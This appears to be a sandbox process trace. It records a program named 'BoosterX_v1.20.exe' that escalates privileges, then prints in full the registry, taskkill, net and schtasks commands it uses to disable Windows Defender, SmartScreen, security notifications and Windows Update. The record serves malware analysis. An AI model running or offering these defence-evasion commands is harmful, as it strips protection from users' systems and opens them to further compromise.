C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4852 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3264 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1176 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5016 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=908 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2120 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=976 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5980 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1148 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe"C:\Users\Admin\Desktop\BoosterX_v1.20.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_SZ /d "Anywhere" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_SZ /d "Anywhere" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotificationOnLockScreen" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotificationOnLockScreen" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /FI "IMAGENAME eq SystemSettings.exe"2⤵
- Modifies security service
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "IMAGENAME eq SystemSettings.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop wuauserv & net stop UsoSvc2⤵
-
C:\Windows\system32\net.exenet stop wuauserv3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
C:\Windows\system32\net.exenet stop UsoSvc3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UsoSvc4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE3⤵
-
